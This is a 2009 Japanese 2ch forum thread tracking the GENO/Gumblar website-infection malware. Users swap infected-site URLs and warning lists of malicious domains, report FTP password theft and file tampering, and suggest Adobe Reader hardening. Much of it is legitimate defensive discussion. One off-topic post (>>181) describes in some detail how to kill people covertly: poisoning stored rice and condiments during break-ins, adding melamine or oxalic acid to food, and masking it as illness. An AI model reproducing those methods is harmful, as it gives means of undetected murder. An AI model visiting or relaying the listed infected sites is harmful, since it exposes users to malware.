GENOウイルススレ　★3

感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ　★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

以下、おまいらテキトーに調査結果、感染サイト情報、テンプレ等をコピペしてくださいです。。。

重複

>>1
乙

>>1乙

>>2
重複してねーよ。GENO社員乙

このサイトをブックマーク推奨
ttp://www3.atword.jp/gnome/

テーマ曲

http://www.youtube.com/watch?v=0x8IMnFCEAM

>>1
乙でした

　　解決したね
　　次スレいらね

とか

　　もうネタもないし
　　次スレいらね

は、もはや様式美なのでスルーしてください。

>>5
これよく出てくるけど、何のサイトだろう

>>6
Judas Priest - Genocide 　(w

重複

>>9
GENO含めたセキュリティ対策情報のブログちゃん

>>5
ν速でftp使うなっていってた人より情報速かったな

Genoウィルス祭り再び？　Adobe Readerの新たなゼロデイ脆弱性に対する攻撃コードが公開
http://tsushima.2ch.net/test/read.cgi/news/1240948172/l50

キャッシュ削除したらお金が降ってきました！
美女がくっついて離れません！
全てがうまくいきました！

むかし、注文個数０．００１とかして遊んでたことあったろ？
アレの反撃だよたぶん

このGENOウィルスも豚インフルの大流行を見越しての仕込み
だったとしたならば作った奴はかなりの強者

強者
↑これって読みは”きょうじゃ”じゃなくて”きょうしゃ”だったのか
知らんかった

諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reade以外の環境設定をどうするかも各自考える必要があります。

>>19

ShellExView などで Adobe PDF Link Helper を無効にしておくと、よりいいかも。
無効にしても「PDFファイルが全然開けなくなる」訳ではなさそう。

蛇足だが
×＞Adobe Reade
○＞Adobe Reader

>>19-20

Adobe Reader Speed Launcher をスタートアップから外す
こともやったほうがいいですよ。

レジストリの書き換えが必要ですけど
「いじくるつくーる」などのソフトを使えばレジストリを意識せずに楽勝です。

>>19-21
これは本当のことですか？
それとも釣りですか？
なんかもう何を信じていいのかわからない…

>>18
釣られてやろう
いまどきの中国産のＩＭＥは
コワモテは変換できてもツワモノは変換されない

>>22
自分を信じろ

強面
兵

漢字二通りあるからなあ

GENOは対応が糞レベルだったんで晒しておいても問題ないが、
zlkonでも検索できるようにした方が良かったんじゃないかな？

これはGeno？

yaplogjp.com/blog/

>>28
違うけどヤプログの偽者
MMO界隈で有名な中華のドメイン
アカウントを盗む目的でキーロガーを仕込む

MMO界隈で有名なドメイン名の例（GENOウイルスではないが危険）

アカウントハック（アカウントを盗む）目的で、キーロガーを仕込む

踏むな危険→yaplogjp.com←踏むな危険
踏むな危険→atewikijp.com←踏むな危険
踏むな危険→gomenifty.com←踏むな危険
踏むな危険→aimeblog.com←踏むな危険
踏むな危険→cavle-online.com←踏むな危険

次スレいらないね

GENO社員乙

ラトビア特急、路線拡大中

2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/30(木) 13456 個のドメインを感染させています。

少し落ち着いてきたかな？

>>31
はええよｗ

ﾌﾟ

>>31
早漏乙

>>28
踏んでしまったとしたらOS入れなおし推奨だよ

このウイルスってPdfが読めないと感染しないのでしょうか？
もしそうだとしたら例えば普段　Foxit ReaderをUSBメモリに入れて置いて、読むときだけ繋げたりしたら…。
面倒くさいですけど。

感染して自分のサイトにスクリプト埋め込まれた。
サイト直して、OSクリーンインスコしたが、また自サイトがやられてたので、
FTPログ調べたら、海外から勝手に書き換えられてた模様。

感染中に接続したFTPのIDとPASSがどっかに送られてたんだろうな．．．
FTPのパス変えないと他の感染マシンからやられる感じだ。

.htmlファイル は bodyタグの前に、
.jsファイルは最終行にそれぞれ埋め込まれてたお。

>>39
二次被害出さないようにしろよ

>>40
誠にお恥ずかしい。
パス変えて、こまめにログチェックするお

>>39
その海外の接続先は特定出来ないの？

2箇所からアクセスがあって、どっちもIPの割当国はアメリカだった。
多分、どっかで感染したクライアントPCじゃないかな。

>>39
FTP以外も監視してるかもしれないらしいからWebのフリーメール
なんかを使ってたらそのへんもパスワード変更推奨
参考サイト
http://www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1868

あと被害サイトを訪問しちゃった人のためにちゃんと告知してあげてね

アクセス元はきっとゾンビだと思うよ

>>44
うん、その辺も全部変えた。
FTPログ見たら、書き換えられてから直すまでの訪問者ゼロwww


Orz

間違い。FTPログじゃなくてWebの方のアクセスログね．．．Orz

ゴールデンウィークはOSのクリーンインストールをしましょう！

カスペオンラインスキャン壊れた！
何度もページ再読み込みして止まらない…
トレンドマイクロみたく乗っ取られたかな？

http://www.kaspersky.com/kos/jp/partner/default/pages/default/check.html?n=1241092961537

>>46
普段それなりに閲覧者がいるサイトだったとしたらそれは不自然かもしれない
元から自分のオナニー用サイトなら問題ないかも

ログファイルを書き込みロックしたり上書きしたりなんてことも
ありえるのかなーとおもったけど、どうなんだろうね

>>49
異常あるようには見えない
なんでもかんでも壊れたっていうんじゃなくて
自分の環境を疑ったほうが良いと思うよ

Adobe Reader/Acrobatに新たな脆弱性、回避策はJavaScript無効化
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html

Adobe Readerなんてほんとインストールするもんじゃないな

>>52
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
>また、現時点でこの脆弱性の悪用が一般に出回っていることは確認されていないとして、

おい、ちょっと待てw

PDF表示だけにしときゃいいものをゴテゴテ機能付けるからこうなるんだよな・・・

アドビは重くて穴だらけだな

>>54
つまり他にも山ほど脆弱性があるんですよ

　　　　　( ´･ω･)　　　みんな〜メキシコ土産だよ〜
　　　　　( っ¶¶と
　　　　(ニ二二二ニ)
　　　　 )=========(
　　　　()　　　.()　｜
　　 　/ヽ======/、
　　((　ﾚ |ヽ＿／､｜ ))
　　　　　|/ ｜　|/
　　　　　 　/ハ
　　　　　　ﾍ⌒ヽﾌ
　　　　　 ( 　・ω・）
　　　　　｛　 U　Ul
　　　　　 ヾ.,____,ノ

>>56
>>19-21を適切に行えば、軽くなるし穴も減らせる。

　 　　　_＿＿ハ＿＿
ﾁｬ　　　、＿＿＿＿丿
　ﾁｬ　　　ﾞﾞ(　ﾟ━ﾟ)　　ｱﾐｰｺﾞ
　　ﾁｬ　　／ﾞﾞﾞc○c○))　ｱﾐｰｺﾞ

ﾁｬ　　　＿＿ハ＿＿
　ﾁｬ　　、＿＿＿＿丿
　　ﾁｬ　　 (ﾟ━ﾟ　)´´　　ﾊﾊﾞﾈﾛ
　　(((　○。○。ﾞﾞﾞ＼　　　ﾊﾊﾞﾈﾛ

>>51
よく居るんだ・・・

手元のPCがおかしいのに
「サーバーにつながらない！なんか設定変えた！？（怒」
「ネットワークできないんだけど！バグってんの！？（怒」
とか電話してくるやつがさ。

まずは隣の人に聞けっての('A`)


Adobe Readerはadmとかで設定を集中管理出来ないもんかね。

ttp://www.nht-osaka.com/news/owabi.html
こんな感じでいっぱいあるんだろうな

スレは鎮火しぎみだけど
早く駆除ツールとか出てほしいけど放置なんかな

次スレいらないなぁ

ファイル書き換えしちゃうから駆除はできても元に戻るわけじゃないのよね
駆除自体もファイルがころころかわるから難しいみたいだし

きりがないからネット用のＰＣは別にした
ダウンロードしたファイル置き場も別にした
これはこれできりがないかも。。。

Adobe Readerもういらない。
アンインストールしようとしたら
なかなかしぶとかった。
で、ＰＤＦは何でみようかな。。

>>66
ＰＤＦを見れるマンガビューワーで良くない？
ＡｄｏｂｅＦｌａｓｈの代用ってあるんだろうか？

全てsandboxie上で実行すれば

>>67-68
ありがとう。

これってFTP接続時にハックされるの？
それともFFFTPなんかのソフトにあるリストをハックするの？

このウイルスに感染すると
ｗｉｎｎｙとかｓｈａｒｅに異常がきたすって有るかな？
両方とも今までに無いエラーでおちた

>>71
は？死ねよ

　　/￣￣￣ / 　/''７ ./''７　　　　　　　　/￣/　 /''７
　./ ./￣/　/　　/__/ /　/ 　＿＿＿_　　 ￣　　/　/
　'ー'　_/　/ 　 ＿__ノ　/　 /＿_＿＿/ 　 ＿__ノ　/
　　　/___ノ 　 /＿___,.／　　　　　　　　 /＿___,.／

　　　_ノ￣/　/￣/　 /''７　/￣￣￣/　　　/￣/　　　　　　　　　　　 　/'''７'''７
/￣　　／　　 ￣　　/　/ 　 ￣ ﾌ　./　　　/　　ﾞー-; 　 ＿＿＿_　　　/　/　/.＿
￣/　/　　 　 ＿__ノ　/　 　__／　 (___　　/　 /ｰ--'ﾞ　/＿_＿＿/　_ノ　/i　 i/ ./
　/__/　　　/＿___,.／　　 /___,.ノゝ＿/　/＿/　　　　　　　　　　　/__,／　ゝ､__/

>>70
接続時に見ています

>>71
ダウソ板から出てくるなよ

>>71
いろいろ感染してそう

71が叩かれるのはなぜ？

蹴飛ばし推奨ドメイン
gumblar.cn

>>78
thx! 早速対応した。

忌野清志郎、死去　★2
http://tsushima.2ch.net/test/read.cgi/news/1241273616/

http://up2.viploader.net/pic/src/viploader999984.jpg

>>61
サーバがおかしいのに自分の使用しているPCに原因があると思って
いろんな設定いじったり、アンインストールしたりした事無いだろお前は

次スレいる？

******* 危険 *******

照英 オフィシャル・サイト
hxxp://www。s-progress。com/talent/show-a/
Analysis report for hxxp://www_s-progress_com/talent/show-a/
現在感染中（６日目に突入）
一応メール送ってるけど反応なし
2009.05.03 AM08 JST 継続

ソース↓
ttp://www3.atword.jp/gnome/

>>83
乙ｗ鎮火するどころか新型インフルみたいにヌルヌル進行してるな

照英のも同型？

GENOウイルスは進化してマッチョウイルスになった？

GWで鯖缶もいないって状態なんだろうか

【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/690-n
【ウィルス情報質問　総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/876-n

>>81
ユーザがおかしいのに自分の管理しているサーバに原因があると思って
いろんな設定いじったり、アンインストールしたりする事あるのかお前は

ttp://www.pen-house.net/brand/brand0119.html
ここのペン先一覧に飛んだらavastがお怒りになられたんだが
もしかしてGENOウイルス罹ってる？

大手が感染したらやばいな

今回のウイルスってアクロバットリーダーのバージョン５
とか古すぎるやつにも対応してるの？
もし対応しててアウトならfoxitかな。最新版は重すぎるし。
でもfoxitはたまに読めないやつがあるんだよな。

んな古いのはもう論外だろ

でも余計な機能が付いていないから踏んでも何も起きないんじゃないかと思うが

>>94
ただ、もし脆弱性があったとしても、放置される可能性があるけどな。

>>94
とっくに塞がれた他の穴が山ほど空いてるだろ…

放置される可能性があるなんてレベルじゃなく、ほぼ確実に放置なんじゃねーの？

>余計な機能が付いていない
表現能力が低い素のHTMLであってもそのブラウザに致命的なバグがどれだけあったか思い出せば、ね
そもそもPDF自体がPostScriptに色々機能をくっ付けた形式なわけで

>>94
javascriptの機能がないバージョンなら問題ないだろ

mosaicが懐かしい・・・

>>99
Mosaicを実際に使っていた日本人ってかなり少なくないか？
翌年にはNetscape Navigatorが出てたし。

PC98にFreeBSD(98)にX-WindowでMosaic
楽しかったな・・・

ttp://www.s-progress.com/talent/show-a/
ttp://www.wellness.co.jp/
ttp://p-frying.com/gaiyo.html
ttp://sound.jp/yudai_marimba/index.html

ttp://www.nenrei-hayami.net/

>>102
踏んじまったじゃないか・・・

>>102-103 のリンク先URL 踏むな危険！絶惨感染中

>>102-103
URLだけ黙って張るなんて……

踏んじゃったじゃないか……
さようなら……orz

>83にあるURLをわざわざ踏むなんて……

>>102は罪に問われるんじゃないのかこれ

>>102-103
てFLASHとreader最新にしとけば大丈夫とか関係なし？

踏んでないんだが、URLだけだと不意打ち食らうとキツイね。
firefox&NoScriptだったら、だいじょぶなのかな

>>108
>てFLASHとreader最新にしとけば大丈夫とか関係なし？
Yes

>firefox&NoScriptだったら、だいじょぶなのかな
なおさら何の問題無い。（ただし、Noscriptの設定が全サイト許可になっていない場合）

>>109
�d

>>104-105
が踏んで…になってるから不安になっちまいました。
ここにいてもまだ対策してなかった or ギャグ　なのかな？

適当な記事にウソリンクでこれ貼られたら無防備に踏んでしまいそう。。

>>107
最も罪に問われるべきは改竄した奴、
次いで(ゴールデンウィークとは言え)放置してる鯖管だろｗ

102踏んでしまった・・・MACでも感染するのでしょうか？

心配するぐらいなら、クリーンインストールしとけ。

パスワードやデータが流出してからでは遅いぜ。

ttp://www.java.com/ja/
Sunのページなんだけどここって感染してる？
なんか表示がおかしいし、ソースもおかしいんだけど。

鑑定スレじゃねーんだ失せろ

>>115
実際にソース見てみると良いよ
最初の1000行以上が空白
Oracleって言うウィルスに感染してる

それはたいへんだ　やばいんじゃないか

>>117

mjd?
ｵﾚこないだjavaダウンロードしちゃった！
それにもｳｲﾙｽ入ってんのかな!?

>>117 の「最初の1000行以上が空白」について

参考までにWindows上のテキストエディターにて改行を数えてみたところ、
最初の空行（改行だけの行 および タブ+改行だけの行）は224行でした。

103 名前：名無しさん＠お腹いっぱい。 投稿日：2009/05/04(月) 19:33:04
ttp://www.virustotal.com/analisis/a474db8500fb7b3456757048d535f5d0
ttp://www.virustotal.com/analisis/2332d6921a4d67aaa18af30e979ee20e

結局GENOウィルスとはなんだったのか

人生

>>120
結局このウイルスはGENOとは違うみたいだがたいていのアンチウイルスソフト入れてれば防御＆検知可能なの？

もうあれから行ってないなあ・・・お気に入りから速攻削除したし、行く気もしないな。

さすがの情弱ももうそろそろあすこは危ないって気づいてるだろ

GENOウイルスについてのまとめサイトのURLってどこだったっけ？

忘れたが全然更新してなかった希ガス何故か誰も利用しない

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

ありがとう

>>129 もよいですが >>5,>>9,>>12-13 も参考にすることを強くおすすめします

>>117
カスペで何もﾃﾞﾅｶｯﾀﾖ.
誤検知じゃないの？

>>117
ただの冗談じゃなかったの？
ttp://www.oracle.com/lang/jp/index.html

>>132
あんたは、Oracleについてぐぐってこい。Sunを買収したとこだよ。
皮肉で言われていることだって気付くのが普通。

GENOウイルスでオタオタする人がオラクルについていちいち知ってるわけないだろ
本気で困るやつもいるんだから、ここだけは親切にいこうぜ

>>134

当方
情弱に於いて並ぶ者無し

>>136
気にすんなｗ
知らないことなんて誰にでもあるさ

ver.5は大丈夫なのか。

>>19（亀レスですが）
１．がAdobe公式ページに載りました

Adobe - Security Advisories : APSA09-02 -
Buffer overflow issues in Adobe Reader and Acrobat
ttp://www.adobe.com/support/security/advisories/apsa09-02.html

ｲﾝｽｺしてるｱﾝﾁｳｲﾙｽソフトのテストしたいんだけど
どっかにウイルス置いてるとこないですかね

>>140
eicar でもやっとけ。

>>141
ありがとうございます
どうやら無事仕事してくれていることを確認しますた

２ちゃんってほんと色んな事に詳しい人がいるんだなぁ…
>>19さん、疑ってごめん。

許さねぇ・・・
もう誰も信じねぇ・・・

>>144
？どうした？

>>145

>>144は ここの>>19と無関係の偽物。誤爆風愉快犯の暇人。

GENOって店、いまはもう大丈夫なの？

>>147
それはあなた次第です！

　
【社会】アドビ(Adobe)製品のセキュリティ問題に苦しめられる企業
　
http://tsushima.2ch.net/test/read.cgi/newsplus/1241598327/

Adobe滅ぶべし
http://tsushima.2ch.net/test/read.cgi/news/1241598738/

やっとOS再インスコしてきたよ
もうGENOは開かない
キャッシュ削除で証拠隠滅しようとしたことは絶対に忘れない

>>150
>>149と違いあるのかと思ったらモット低俗かよ
ν即民雑魚すぎ、だから（ｒｙ

>>148
あそこは元からアウトだろｗｗｗ

>>151
オレもろくな対応をしなく誠実さの欠片もないホビコンのサイトは二度と覗かない
昨日開催のイベントで謝罪広告が一切無しなのは許せない
忙しくてOS再インスコするまで2週間もパソコン使えず迷惑した

>>154
ホビコンでも２回くらい同じような書き込みしてただろｗ
今あそこは疥癬があれこれかえてウレチーって言ってるだけのアホスレになってるから
書き込むだけアホらしいよ。
運営がどうしようもないのはディーラーならよく分かってるからＷＦとトレフェスで頑張れ。

Firefox用アドオンのLinkExtendってよいな。
Dr.Webプラグインはほとんどのサイトでクリーンって言われてしまうけど、
Google、Norton、McAfee等の評価を利用できる。
カスペあたりを入れておいて、ヤバ気なサイトはLinkExtendでチェックすれば
かなり安全な気がする。
https://addons.mozilla.org/ja/firefox/addon/10777
http://www.linkextend.com/

>>156
AVGとの組み合わせだと、どうでしょうか？

>>157
知らね。
入れてみればいいんじゃない？
機能も細かく個別に切ったりもできるし。
万が一他のプラグインとの食い合わせが悪かったら捨てちゃえばいいだけでしょ。

www.beauty-wed.co.jp
なぜかここはgumblarがalertになってる。注入失敗?

【重要】掲載広告における遷移先ページのウイルス感染について　[2009/05/07]
ttp://www.heso-click.com/info/index.asp?info_code=264

>□対象の広告
>　 競馬情報会社　ホースマンクラブ

>ホースマンクラブ様のサイトを閲覧されますと、「gumblar.cn」という
>ドメインからスクリプトがダウンロードされ、その後別のファイルをダウンロードして
>不正な処理が実行されるようです。

>>160
その広告が掲載されてるポイントサイトにメールした。
今日になって広告が消されていたのが３サイト。
（へそクリック　そんなバナナ　preco）

そのままなのが２サイト。
（つぼマイル　おこづかい生活）

ホースマンクラブっての自体は今でもヤバいの？
aguseで調べても問題が検出されないんだよな。
生で踏む勇気はないｗ

1時間くらい前に見に行ったら直ってたっぽい。
ちなみにその前はAVASTがガンガン反応してた。
サイト管理者のPCが直ってるかは不明ｗ

>>163
さんきゅ。
>>156のプラグインが役に立つのかどうか未だにわからん。

156入れたら技術系サイトが表示されなくなった
無理やりjavascriptで書き換えてバグるっぽ

>>165
例えばどこあたり？
@ITなんかは普通に表示できてるけど。

ビッグ3破綻とインフルエンザですっかり影をひそめちまったな
もっと頑張らないと忘れられちまうな

おーい
今さっきＧＥＮＯからメールきたんだけど
もうwebサイトの方はういるしゅ抜きに戻ったの？

店舗に行くか・・・というかそこで買うのもなんか嫌だから
似たような店教えてくれ←感染しないとこおねがいｗ

>>168
> もうwebサイトの方はういるしゅ抜きに戻ったの？

今のところは大丈夫なのかもね。
どんな対策を取ったのかまったくわからないから、パワーアップした
新種のGenoウィルスを食らう覚悟が必要だなｗ

数日おきに入れ代わってるからな、GENOウイルス本体は。

2chのサーバー会社にウイルス
http://tsushima.2ch.net/test/read.cgi/news/1241785943/

じわじわ感染が広がってるな
GENOの最初の対処がまずかったのも一因か

maidなんとかってのは踏んだことはないが、2ch見てたら自動的に踏んでるってこと？
もう勘弁してくれよ・・そういうのわかんないんだよ・・・

>>173
専ブラ使ってないの？

ヌーブラ愛用してます

>>169,170
ほんとかよ・・・何が原因かわかってないのね

専ブラ使ってる。
使ってたら大丈夫？

>>173
2chのトップ(http://www.２ch.net)とちがくね？

>>177
問題ないと思う

>>178
>>179
ありがとう。

汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html
　　夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
　　精神的に追詰められる心理サスペンスの傑作！　　
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
　ガスライティング----で検索　ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。

ここ反応するんだけどどう？
ttp://www.freaksstore.com/

EXQAUTOのウェブサイトもやられたね。
連休中は死亡状態だったが、今は復旧している模様。
但し、感染にかんするコメントは出されていない。
（闇に葬った可能性大！）

5月6日までにアクセスした人はクリーンインストールよろ。

マジで被害広がってるじゃん。
世間じゃ全く話題にならないけど…

>>182
www.freaksstore.com のウェブサイトに含まれている gumblar.cn のサイトの要素に、
コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性が
あります。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する
場合があります。

>>184
まぁいいんじゃね？
そのうち職場のやつらが騒ぎ出したら笑いこらえるのがタイヘン

>>182
難読化されたJSコードが挿入されている。
UAを調べてVista未満のWindowsだとgumblar.cnに飛ばす。

Genoウィルス怖いねー

>>182
何で反応したの？

AVG

>>189
http://pc11.2ch.net/test/read.cgi/sec/1235459712/

（>>189はもしかして↓の ID:kiwZ4rzt だったりして？）
（http://tsushima.2ch.net/test/read.cgi/news/1241785943/50-52）

>>191
そのIDの人とは、別人です。GENOも最初見つかったときは、対応しているセキュリティ
ソフト少なかったから未知のウィルスの対応ってどうすれば、いいのかな？って思って質問
したのです。さっきのリンク先は、URLチェッカーだと安全って表示されてたしね

リンク先飛んだんだが、javaきってるからAVGが反応してくれるのか分かんないよ・・・

gumblar.cnはgeno以上に活動してるな

>>187
アドレス変わったのか

zlkonは途中で経路切られて終了かと思ったのに

>>182,>>193
Avast以外はスルー。

ttp://www.virustotal.com/analisis/2febff2a5a33a9c9564e247f658cb97d (2/40)

ここも参考になります
ttp://ilion.blog47.fc2.com/blog-entry-128.html

>>194
どうしてもガンダムに見えるんだよなぁ

なぁなぁ、感染してるっぽいサイトをGoogleで検索しただけでavast先生が警告するんだが
これってどうなってるの？
ひょっとして対策してなかったらググっただけで即感染するのか？

例）「村民」で検索したら一番最初に出てくる村民バスのうんたら〜ってサイトが感染してる
らしくavast先生が反応する。
※当然だけど試すなら対策してからやってくれ

>>199
これも>>182と同じだな。難読化のやり方は違うけど処理はまったく同じ。
avastがどう判断してるのかわからないけど、
ググっただけで感染するのはGoogleが改竄されたときだけ。

>>199やっかいだな
対応していないアンチウイルスソフトが多すぎる

Adobe ReaderとFlash Playerを最新版にして、Javascriptを無効にしてても
感染しちゃうのでしょうか？

散布元がこれだけファイルをコロコロ変えてくるとシグネチャ定義では対応できません。

>>202
感染します。
感染後の、AdobeReaderを利用した動作部分のみ行なえないだけで、他の動作はするでしょうね。
常駐してftpサイト更新を検知したら〜とか。コマンドプロンプト出そうとしたら起動できないとか。

ほぼ日替わりで本体が入れ代わってるので、その日に、どんなものが落ちてきて実行されるかなんて
わかりません。業者の方が撤退しない限りは、PG2などで、gumblar.cn の範囲をブロックするのが有効です。

Javascript無効なら感染しないんじゃないの？

>>202の条件なら、しねぇだろ

お気に入りの通販サイトなんかあったらjavascript有効にするだろうから
普通のサイトが突如ウイルス拡散することになるのは恐怖だな。

さっきPDF開くようなサイトじゃないのにAdobe ReaderがJavaScriptがONじゃないと表示されないよと
警告してきた。Adobe Reader9のJavaScriptは切ってる。これはもしや引掛ったか？

>>199
感染するかは分からないけど、先読み無効に出来るみたい。

ttp://www.google.com/help/features.html

リンク先読み機能 - プリフェッチ

一部の Google 検索については、ユーザーがクリックする前に最上位の検索結果のダウンロードを開始しています。
そのため、最上位の結果をクリックすると、リンク先ページが高速で読み込まれます。

この特殊なプリフェッチ機能は Firefox および Mozilla ウェブ ブラウザだけで、Internet Explorer などの他のブラウザではご利用いただけません。
Mozilla のプリフェッチ FAQ に記載されているとおり、プリフェッチ機能はウェブ ブラウザの設定で無効にできます。
Firefox でプリフェッチを無効ににする方法:

アドレス バーに「about:config」と入力します。
「network.prefetch-next」の設定まで下にスクロールし、値を「False」に設定します。

>>208
リンクされない程度に削ってURLうｐおね

>>210
h++p://cmd-pro.com/m_com.html

>>209
先読みが静的データとしてバックグラウンドで読んでるならいいのだが、違ったら感染するな

>>211
gumblar.cnだな。
あと、そこと同じようなレイアウトのサイトが他にもいくつかあるんだが、
もし管理者が同じ人物なんだとするとftp経由で軒並み改竄されるかもしれない。
ちょっと確認したところでは
www■wa-purokentei■com
は改竄済み。

>>208
Adobe側のScriptをオフにしといたんだろ?
メッセージを鵜呑みにしてオンにしなきゃセーフ

>>213
了解した。サイト管理者に通告すべきだな。
あと、acroreadのJavaScript切ってたら大丈夫だろうか…
今a-squaredでスキャン中なのだが。

>>214
ONにはしなかった。一応だけど調査継続しておく。

>>216
切ったままでオンにしなきゃ大丈夫。
その状態でわざと踏んで検体拾って送ったりしてるんで。

>>217
だが結局はAdobeだ。死ぬなよ。

>>218
今のところ平気。

ちなみにFoxit用のコードも実戦投入されているので
FoxitもScript切らないとだめくさ(設定箇所は同じ)。

>>212
それはまずい
けど、そんなに問題ならもっと以前から騒がれてる気がするけど
結構昔からついてる機能みたいだし

これに感染したっぽくてバックアップデータを取って
ＯＳを再インストールしたいんだけど
インスコし直したＰＣにバックアップデータを入れても
ウイルスってついてこないのかな？
こういった感染例ってありますか？
新ＯＳでスキャンして反応なかったら大丈夫なのかな

管理してるサイトに置いてあったPHPに例の一行目と、HTMLにjsが追加されてるのを発見
クライアントPCは感染していないのを確認
実は数日前、レンタルサーバー屋さんに速度がらみでのなにかしらの処理をしてもらった
のだが、これが原因ということはありますかね？
サーバー屋さんが感染してるとか…

>>199
>>209
ｺﾜｰｲ

>>221
単純にそれだけ聞く分にはまだダメじゃないか？

・FTP他のパスワードを新環境側から変更する
・手持ちのHTML系データは手作業で感染チェックする
・バックアップソフトで一括バックアップはしない
・アンチウィルスが全て対策してるわけではないので、信用しすぎない

HTMLの手動チェックは辛いところだが、他は最低限気にすべきかと思う

>>189
ttp://www.virustotal.com/jp/analisis/7ee6d2d0e533eb6536236075c84c9482
これだろ

これだけ感染が拡大してるのに世間の盛り上がらなさは異常。

正規サイト改ざん：国交省、全日本民医連、NHT紀尾井町グループ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1876

以前の薬事日報といい、医療関係を軸に広がりを見せてる？？
紀尾井町のも自毛植毛だから整形外科で医療扱いだし
岐阜はワカラン

>>222
どうだろうね。
ftpのパスを抜かれて改竄されるみたいなんで
鯖屋さんがftp経由で更新してたらその可能性もあるかも。

あとクライアントPCが感染してないと判断した根拠が何なのかってのも問題になる。
この種類の攻撃だとdropperも本体もサーバ側で入れ替えし放題なので、
アンチウィルスで検出できないだけでクライアントPCが実は感染してましたってことも考えられる。

>>227
全体的に広がってるけどちゃんと対応するのが医療関係だけで
ほかはもみ消したり気づいてなかったりするかんじ

GENOとしては「うちだけじゃないからｗ」ってことで一安心だろう。

gumblar.cn踏んだ後にUDP52468で色んな所からアタック来ない？

>>230
糞みたいな対応したのは数少ないけどねたぶんｗ

GENOから感染したってのが多いだろ

5月1日時点のGENOウイルス感染数（初期GENOウイルス）


日本　13,024件


････････････・・・・・・・・・・・・・・・。

なあ、このウイルスってもうYahooのトップで警告しなきゃならないくらいのレベルだよな？
削除があまりにも難しく、しかも亜種が続々。

なんでダンマリなの？

詳細が不明だから

照英のサイト改竄は芸能人だし、これをきっかけに
ニュースにもでもなるかと思ったけど静かなもんだね

IPAすらGENOウイルス自体を知っているとも思えないが。

IPAは身内が感染しちゃうぐらいだしなぁw

>>124
>>127

必死

誤爆か

PC通販ショップ「GENO」が不正アクセスで不具合　今回のトラブルについてのお詫び
http://gimpo.2ch.net/test/read.cgi/owabiplus/1239264401/l50

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/l50

【ｳｲﾙｽ感染】GENOを語るスレ30【ｱｸｾｽ注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/l50

【新種ｳｲﾙｽ】GENOを語るスレ31【無料配布中】
http://pc11.2ch.net/test/read.cgi/pc/1239197673/l50

【ｳｲﾙｽ】GENOを語るスレ31【完治】
http://pc11.2ch.net/test/read.cgi/pc/1239199378/l50

【ｳｲﾙｽ被害】GENOを語るスレ32【謝罪なし】
http://pc11.2ch.net/test/read.cgi/pc/1241248612/l50

【顧客相手に】GENOを語るスレ24【ｻｲﾊﾞｰｼﾞｪﾉｻｲﾄﾞ】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50

【8BOAA】 GENOを語るスレ26 【zif付き】
